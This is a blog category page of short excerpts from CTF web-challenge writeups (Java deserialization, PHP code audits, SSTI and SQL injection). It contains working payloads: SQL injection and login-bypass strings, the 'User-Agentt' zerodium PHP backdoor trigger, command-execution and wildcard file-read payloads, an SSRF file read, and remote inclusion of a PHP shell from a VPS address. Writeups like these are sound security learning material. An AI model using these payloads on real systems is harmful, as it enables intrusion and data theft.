比赛WP
文章平均质量分 74
比赛WP
bfengj
vegetable web dog
展开
-
2022-D^3CTF-Web-Writeup
2022-D^3CTF-Web-Writeup前言比赛的时候做了shorter就摆烂了,正好有个作业拖到了周末别的题目就没怎么看。幸好比赛环境还保存1周,把Java给复现了,剩下3题看看wp学习学习不想复现了。别的题目的wp参考网上吧。shorterrome反序列化,但是要缩短长度。参考https://4ra1n.love/post/-IMSkqHfy/#%E5%88%A0%E9%99%A4%E9%87%8D%E5%86%99%E6%96%B9%E6%B3%95但是最后还是长了。改用Jiang宝原创 2022-03-07 23:48:42 · 5485 阅读 · 0 评论 -
D3CTF2021-non-RCE
non-RCE前言去年D3CTF的题目,最近刚复现完国赛的那道Java,感觉出题的思路也是魔改的这题,所以来复现一下这题。password绕过不谈代码了,因为审完之后思路还是比较清晰的,就是利用JDBC对AsjpectJWeaver反序列化写文件到classpath然后反序列化rce。第一重过滤是这个: public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterCha原创 2022-03-07 19:53:52 · 4160 阅读 · 0 评论 -
2021-CISCN-fianl-ezj4va
2021-CISCN-fianl-ezj4va前言去年国赛决赛的0解Java,后来出现在了DASCTF八月挑战赛,当时不太会Java所以没有看,今天找个时间复现了一下。写的比较简单,具体可以看参考链接中的文章。代码审计访问/robots.txt得到文件名可以下载到源码。pom.xml:<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"原创 2022-03-04 00:27:41 · 4760 阅读 · 0 评论 -
2022-工大抗疫-web-writeup
Web1GET /There_is_no_flag_here.php HTTP/1.1Host: eci-2ze7fu15ewwxadups678.cloudeci1.ichunqiu.comCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.原创 2022-01-21 12:09:00 · 1754 阅读 · 1 评论 -
2021-湖湘杯final-Web
2021-湖湘杯final-Web前言今年湖湘报的社企组的结果就是最后只能摆烂,然后决赛那段时间正好在复习期末,然后考完了想好好的休息一段时间,打游戏打累了再来复现一下湖湘杯final的题目放松放松。vote今年HTB的基本上算是原题了,复现的时候才发现当时做那题的时候就摆烂没管了,所以一点印象没有。。。const path = require('path');const express = require('express');const pug原创 2022-01-05 19:41:44 · 2086 阅读 · 1 评论 -
2021-西湖论剑-Web-Writeup
前言师傅们随便看看吧。。排版可能不太好,第一次用飞书,wp有一部分是学长写的,弄到csdn上也懒得重新排版了。。。oa?RCE?首先先看到一个登录界面先试一下弱口令admin/admin123进入后台后台功能点很多,试了下网上的poc,结果没有写入权限。开始审计代码发现有个phpinfo的路由,访问一下发现了开启register_argc_argv。时发现这个cms的文件包含点特别多,但是很多都限制了文件后缀,比如Action.php,这里我恰好在index路由中找到了一个只限制后缀为.ph原创 2021-11-21 12:36:54 · 6070 阅读 · 2 评论 -
2021-湖湘杯-Web
前言总的来说的话,题目质量还是不错的,另外那道XSS也是0解,也幸好自己是一点XSS都不会(寒假补一波),卷是真的卷,还有很多的东西都只停留在表面吧,除了shiro的鉴权绕过是自己之前专门学过的,所以打开pom.xml看到1.5.0的版本立马就知道这题得有个鉴权绕过,别的,剩下的打shiro一开始没打通才换了工具打(后来才发现我一直在拿cc的链子打,我说怎么打不通。。。)。还是慢慢学习了。easywill打开页面发现是个WillPHP,而且应该就是assign的模板渲染了,而且根据这个东西和tp有点关原创 2021-11-14 21:08:07 · 4532 阅读 · 4 评论 -
2021年深育杯Web
WebLog访问发现是个文件下载,下载的是日志文件,目录穿越不太好传,尝试拿bp爆破一下日期来下载Log,发现了一个jar:访问?logname=cb-0.0.1-SNAPSHOT.jar把jar包下载下来,发现存在一个反序列化的后门: @ResponseBody @RequestMapping({"/bZdWASYu4nN3obRiLpqKCeS8erTZrdxx/parseUser"}) public String getUser(String user) throws E原创 2021-11-14 18:33:41 · 2135 阅读 · 2 评论 -
陇原战疫2021网络安全大赛 Web
前言题挺有意思的,Web有点难,而且后面三道难题放的有点晚了,时间不够(肝了一下午的Java)。这个比赛的难度,能早9晚9的话可能还好一些,早9晚5就有点紧了。Java还是太菜了,需要学很多的东西。eaaasyphp反序列化链的构造很简单就不提了,正常构造写文件发现应该是不行的,目录应该不可写。给了个Hint类里面提示phpinfo,那打一下phpinfo看一下:class Bypass { public function __construct(){ $this->原创 2021-11-08 11:02:44 · 5355 阅读 · 3 评论 -
RCTF2021 EasyPHP
EasyPHP先分析一下nginx.conf,也是一个一个查的来好好的学一波。listen:监听设置。server_name:设置虚拟主机的名称,域名,可以通配符、正则。如果当一个名称匹配多个 server 的是时候,匹配优先级如下:确切的名称以 * 开头的最长的通配符名称以 * 结尾的最长通配符名称第一个匹配的正则表达式location:根据 URI 进行配置设置。location [ = | ~ | ~* | ^~ ] uri { ... }none,如果没有修饰符,则将该原创 2021-11-08 00:58:40 · 1596 阅读 · 0 评论 -
RCTF2021 ezshell
前言RCTF当时没打,感觉还是错过了学习的机会。今天下午看firebasky师傅的github的时候偶然看到了RCTF的题目,所以打算找个时间把这个比赛的Web复现一下。就没有把所有的web题目都放一篇文章上,因为最近各种事情还有复习,复现题目也是断断续续了,可能接下来会过个好几天才继续看下一题,时间间隔拉的太久,而且每道题学到的东西也比较多,写的相对来说也比较详细,就单独拉出来成一篇文章了。WriteupMisc里面的一道Web,get访问/shell之后可以得到源码反编译之后审计一下:////原创 2021-11-05 22:10:47 · 545 阅读 · 0 评论 -
第四届强网拟态 EasyFilter
前言当时比赛没报名,借了个号上去瞅了一眼题目,看到这个PHP代码审计比较亲切就做了这一题,当时也是通过报错大胆尝试成功试了出来解法。赛后花爷拿着我的wp去了p神的知识星球问了一下原理,P神给了个解答,但是自己还没有看过PHP的C代码所以很难理解(实际上都一年没有碰过C语言了)。恰好打算把最近的事情忙完就去学学PHP的底层,过了这么些天,昨天弄好了vscode调试PHP的C代码的环境,今天仔细研究了一下终于有点懂了,而且第一次看PHP的底层C,感觉学到了好多的东西。做题时候写的WP<?php原创 2021-11-04 10:46:38 · 581 阅读 · 0 评论 -
[2021东华杯]Web Writeup
EzGadget给了源码,IDEA打开看看,有个反序列化的点: @ResponseBody @RequestMapping({"/readobject"}) public String unser(@RequestParam(name = "data",required = true) String data, Model model) throws Exception { byte[] b = Tools.base64Decode(data); I原创 2021-11-01 00:53:02 · 3557 阅读 · 4 评论 -
[Writeup]2021强网拟态 Give_me_your_0day
前言当时没能做出来,当时想到了mysql恶意服务端读取文件,但是没能读成功,不知道是为什么。今天看到Firebasky师傅的github更新了writeup,也是学习了一波。解法1当时没有拿Seay去扫,单纯的自己肉眼审install.php。自己审这种前后端没有分离的代码,只会去看不涉及到前端的PHP代码,就出了问题,遗漏了漏洞。拿Seay扫一下第一条就能扫到,install.php608行的这个文件包含漏洞: <?php requir原创 2021-10-29 21:48:25 · 520 阅读 · 0 评论 -
[WMCTF2021]Make PHP Great Again And Again
前言也是很久之前WMCTF2021中Web的一道题目,当时一点头绪都没有,然后也没有复现,今天晚上跟着赵总的博客进行了学习,也是学习到了非常多的东西。本文只是跟着赵总的博客进行了一波复现,记录下来,仅此而已。题目环境题目本身给了shell,但是有着诸多的限制,包括disable_functions,open_basedir,flag文件是700等。而且不出网,流量是nginx转发进内网。考虑到是nginx+php-fpm,联想到之前蓝帽杯的那题,很正常会想到利用ftp的被动模式攻击fpm实现恶意加原创 2021-10-27 00:05:59 · 529 阅读 · 5 评论 -
[WMCTF2020]Make PHP Great Again
[WMCTF2020]Make PHP Great Again前言突然想到今年WMCTF2021 赵总出的那道Web还没去复现,就打算复现一波,然后又想到去年的Make PHP Great Again也还没复现,就先来buuctf上面复现一下这个题目。非预期没啥好说的了,文件包含,PHP_SESSION_UPLOAD_PROGRESS万能非预期:import ioimport sysimport requestsimport threadinghost = 'http://a4b822a原创 2021-10-26 16:50:14 · 695 阅读 · 0 评论 -
2021年 极客谷杯 Web
粗心的开发人员存在/info,提示发现目录下存在R.class文件,可能导致源代码泄露,请及时处理!将R.class下载下来拿IDEA打开审计://// Source code recreated from a .class file by IntelliJ IDEA// (powered by FernFlower decompiler)//package com.example.demo2;import java.io.BufferedInputStream;import java原创 2021-10-22 19:24:09 · 787 阅读 · 1 评论 -
鹤城杯2021 Web
easy_sql_2登录功能,post传username和password。尝试admin,admin弱口令登录成功但是提示flag并不在这里。username尝试-1'||'1'%23发现是password error!,因此猜测后端的应该是根据传入的username查出对应的password,查到了就不再是username error!,然后讲传入的password进行一次md5后与这个password比较,相同就登录成功。尝试SQL注入,但是ban了select,因此利用table注入。数据库原创 2021-10-09 20:23:56 · 4505 阅读 · 2 评论 -
ALLES! CTF 2021 Web
Sanity Check进入之后发现是个奇怪的页面,问我不是机器人叭?bp抓个包,发现是418响应码,查到的都是说这是一种反爬虫机制,需要加上UA头才行。但是我本来就有UA头。突发其想请求了一下robots.txt,得到flag。J(ust)-S(erving)-P(ages)当时比赛的时候没能做出来,今天问了一下Y4师傅,也是知道了怎么回事。首先就是GlobalServerContext.java里面,添加了一个admin用户,且isAdmin是true。然后把flag放到了上下文中:原创 2021-09-07 13:33:33 · 399 阅读 · 0 评论 -
[Writeup]GrabCON CTF 2021 Web
前言打了一下,感觉是比较入门的CTF。E4sy Pe4sy要Hack admin user!,经过尝试发现login的时候password存在SQL注入,可以万能密码:POST /login/index.php HTTP/1.1username=feng&password='||1=1%23&login=Login万能密码登录成功即可拿到flag。Door Lock事实证明国外的比赛质量也是需要考虑的。。。唉。。。。注册登录发现有个?id,以为是SQL注入发现不是。。。原创 2021-09-06 00:27:00 · 323 阅读 · 0 评论 -
[WriteUp]GKCTF2021 babycat
前言最近想找一点Java题做,看看CTF中的Java题都是什么样的,想到之前GKCTF里面有这么一道Java,存在非预期所以后来修复了,来做了一下学习学习。非预期进入环境发现有登录和注册的功能,看一下注册那里的f12知道了后端接收的方式和数据:<script type="text/javascript"> // var obj={}; // obj["username"]='test'; // obj["password"]='test'; // obj[原创 2021-09-03 12:40:38 · 560 阅读 · 0 评论 -
WMCTF 2021 ez piwigo(插件)
前言太难了。。。只会这一题。。。人已经做麻了呜呜。ez piwigo利用插件应该是非预期了,所以后来又出了个ez piwigo again。admin,admin登录后进admin.php后台。piwigo的版本是11.5.0,很新的版本,估计预期解是个0day了。。真就0dayctf呜呜呜。LocalFiles Editor这是一个文件操作的插件,尝试直接编辑配置文件但是提示local目录不可写,所以没法直接利用插件来写马。后来又挖了这个插件的任意文件读取漏洞,但是发现读/flag读不到,拿了s原创 2021-08-31 10:10:01 · 976 阅读 · 0 评论 -
祥云杯2021 Web复现
前言正好buuctf上放了那三道js的题目,就正好复现了一下,学习学习。cralwer_z有注册登录,更新个人信息还有爬虫的功能。但是想使用爬虫功能会受到限制: if (/^https:\/\/[a-f0-9]{32}\.oss-cn-beijing\.ichunqiu\.com\/$/.exec(user.bucket)) { return res.json({ message: "Sorry but our remote oss server is under mainte原创 2021-08-25 16:45:03 · 1841 阅读 · 2 评论 -
祥云杯2021 Web简单题wp
前言千言万语汇成一句:我真是太菜了。事实证明只会个php在卷成这样的ctf比赛里面只能挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打。不会Java和js直接下线,只能卑微的做最简单题原创 2021-08-23 13:29:06 · 578 阅读 · 1 评论 -
RACTF 2021 Web复现
前言最近向Y4师傅学习,慢慢开始打国外的比赛。13号-16号的RACTF当时看了一下做出来人数最多的Web题,发现一点头绪都没有,就直接爬了,感觉这个比赛可能难度挺大的。还是有些畏难了。今天早上看到Y4师傅发了这个比赛的WP,我又去官网上看了一下,部分的Web的WP也发了,而且题目环境也都没关,所以就又去做了一下,不会的Web题如果有wp的话也跟着wp学习了一下进行了复现。Really Awesome Monitoring Dashboard用的是Grafana v8.1.1,查了一下没找到这个版本的原创 2021-08-19 15:48:20 · 1504 阅读 · 0 评论 -
Hacker‘s Playground(SSTF) 2021 Web
Flag SubmissionSCTF{It_15_tim3_t0_hack!!}SQLi 101?id=admin'%23&pw=1SQLi 102?searchkey=-1'union select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_name = 'findme' %23SW Expert Academy一道离谱的题目,输入C程序然后会运原创 2021-08-17 23:56:16 · 283 阅读 · 0 评论 -
InCTF 2021 Web
前言太菜了,根本不会,笑死。6道Web,有三道是XSS,我一点XSS不会,直接哭了。Raas一个输入框,是post传的url,可以SSRF,根据dockerfile里的内容可以知道文件在/code/app.py,下载下来:url=file:///code/app.pyfrom flask import Flask, request,render_template,request,make_responseimport redisimport timeimport osfrom util原创 2021-08-16 15:03:40 · 479 阅读 · 0 评论 -
BSides Noida CTF 2021 Web Calculate
前言没有打比赛,但是有个师傅问了我这题,做了一下发现不会,学习了一波Y4师傅的WP。WPf12传个?????既可以获得完整的源码:<?phpif(isset($_GET['????'])) { highlight_file(__FILE__);}function filter($payload) { if (preg_match("/[a-zA-BD-Z!@#%^&*:'\"|`~\\\\]|3|5|6|9/",$payload)) { retur原创 2021-08-09 13:30:52 · 1220 阅读 · 0 评论 -
红帽杯2021 决赛 opensns 复现
前言因为某些事情,没有参加今年的红帽杯决赛,所以来复现一下决赛的Web题里面的opensns,学习一下思路。复现根据网上的文章进行复现学习。感觉能找到这个洞的师傅实在tql。漏洞点位于Application/Weibo/Controller/ShareController.class.php的shareBox方法: public function shareBox(){ $query = urldecode(I('get.query','','text'));原创 2021-08-05 18:08:19 · 691 阅读 · 1 评论 -
卫生CTF 2021 Web
前言比赛是第二届全国卫生健康行业网络安全技能大赛,赛后借了个账号复现了一下Web题,整体偏简单叭,做到CMS那题的时候环境关了。签到f12,拿到flag。easy_web1f12发现There_is_no_flag_here.php,再f12提示本地访问:Client-ip:127.0.0.1即可得到flag。easy_web2ctfshow上的原题,直接打了:?shell=/???/????64 /????????然后base64解码即可。super_hacker Via 头原创 2021-07-11 23:52:25 · 1420 阅读 · 1 评论 -
CTFShow2021七月赛Web
CTFShow2021七月赛Webwarmup $ext = pathinfo($_GET['file'], PATHINFO_EXTENSION); if($ext==='php'){ include $_GET['file']; }要求文件后缀为php,经过测试可以远程文件包含。VPS上写个php马直接包含即可。?file=http://118.31.168.198:39543/feng.php0=phpinfo();存在disable_functi原创 2021-07-10 20:04:44 · 948 阅读 · 5 评论 -
CTFShow2021六月赛Web
CTFShow2021六月赛Webbaby_captcha嗯。。。阴间题。。。。呜呜呜就是直接爆破,先听一个正确的验证码,然后直接bp爆破,别管302,爆破正确了会直接返回200:爆破的脚本也在题目的首页给了,是github上的password500。ctfshowcms我出的一个简单的代码审计,取自某个新手入门审计的CMS。其实真正的对于渗透利用不大,但是感觉这种思路挺有意思的,很适合用来当CTF题目来出。index.php存在一个任意的php文件包含:$want = addslashe原创 2021-06-02 18:00:41 · 977 阅读 · 13 评论 -
第四届红帽杯网络安全大赛 Web 部分writeup
前言记录一下web的wp,随手写的,只会前三题,确实都很简单。find_it扫到robots.txt,发现1ndexx.php,直接访问不了,访问.1ndexx.php.swp得到源码,然后读flag:?code=<?= show_source(glob('./*')[2]);再访问hack.php:base32解密一下即可得到flag。framework是个yii2的框架,扫出来www.zip下载源码,找到了反序列化的路由,yii2的反序列化之前审过了,直接拿POC打:<原创 2021-05-09 22:38:28 · 9956 阅读 · 27 评论 -
Ctfshow 五月赛 大牛杯 Web&BlockChain
web_checkinban了这些:acegikmoqsuwy13579\+_\(&-#@~\[{\"\.,:直接拿短标签和nl,反引号打:?><?=`nl%09/*`原创 2021-05-03 23:51:16 · 1717 阅读 · 5 评论 -
Cyber Apocalypse 2021 Web 几个简单题目的wp
Inspector Gadget进入看到CHTB{,f12发现有个main.js,第一行:console.log("us3full_1nf0rm4tion}");即CHTB{us3full_1nf0rm4tion}MiniSTRyplace源码下载下来审计一下,看到的第一行php代码就感觉有问题:include('pages/' . (isset($_GET['lang']) ? str_replace('../', '', $_GET['lang']) : $lang[array_rand(原创 2021-04-24 01:11:52 · 365 阅读 · 0 评论 -
2021虎符初赛Web部分题解
前言这个WP还是直接复制粘贴的当时随手写的WP。。。太懒了别骂了呜呜呜。。。签到几天前PHP的那个后门,当时笑死我了的那个User-Agentt。User-Agentt: zerodiumsystem("cat /flag");unsetmefatfree框架,搜一下有一个漏洞符合,即3.7.1的代码注入,但是题目打不通,怀疑是因为版本的问题,下载3.7.3的fatfree看一下,主要是这部分:$val=preg_replace('/^(\$hive)/','$this->hive',原创 2021-04-05 00:36:52 · 1440 阅读 · 0 评论 -
“红明谷“ 初赛 web 部分WP
前言参加了第一届红明谷的比赛,4道web当时只做出2道,第三道苦于那个数据库的密码不知道,赛后才问了别的师傅才知道是123456这个弱密码。。。草了。因为实在太懒了。。。本来不想专门写这篇WP的,因为当时做题的时候只潦草的记下了当时的wp,用的姿势可能还不是最简便的方式。但是想想,不写的话总感觉缺了点什么,所以就把我当时潦草的wp记录给复制粘贴过来了(笑),见谅见谅。happysqlban了单引号,但是查询的语句中用的是双引号,拿双引号闭合,如果登录成功的会302跳转到home.php,因此可以布尔原创 2021-04-03 22:44:43 · 1393 阅读 · 0 评论 -
MAR & DASCTF 2021 baby_flask
前言周末又到了补作业的好时间,本来想逃一波作业来打打这个比赛,结果卡的我属实难受,把第一道web的ssti给做了就去补作业了,其他的web没来得及看,不知道还有没有复现了(哭)。easy_SSTI(好像是叫这个?)单纯的SSTI了,f12看一下给了黑名单: Hi young boy!</br>Do you like ssti?</br>blacklist</br> '.','[','\'','"',''\\','+',':','_',<原创 2021-03-27 22:50:06 · 3317 阅读 · 4 评论 -
NepCTF2021一些web题目的总结与复现
前言参加了今年的NepCTF,题目质量很好,就是周末事情比较多,而且只会php,没有全身心去做,原创 2021-03-23 20:05:08 · 3839 阅读 · 11 评论 -
Hgame2021 week2 web
前言week2的web难度还好,一道变量覆盖,一道SQL注入,一道条件竞争还有一道XSS。因为不会前端。。。XSS没做出来,今天学习一下官方的WP和大师傅们的WP。LazyDogR4U存在www.zip,下载下来审一下代码。要想得到flag,需要if($_SESSION['username'] === 'admin'){但是正常的登录时没法让session那里是admin的,所以这题其实登录不登录没什么用。注意这里:$filter = ["SESSION", "SEVER", "COOKIE",原创 2021-02-15 20:01:35 · 1067 阅读 · 9 评论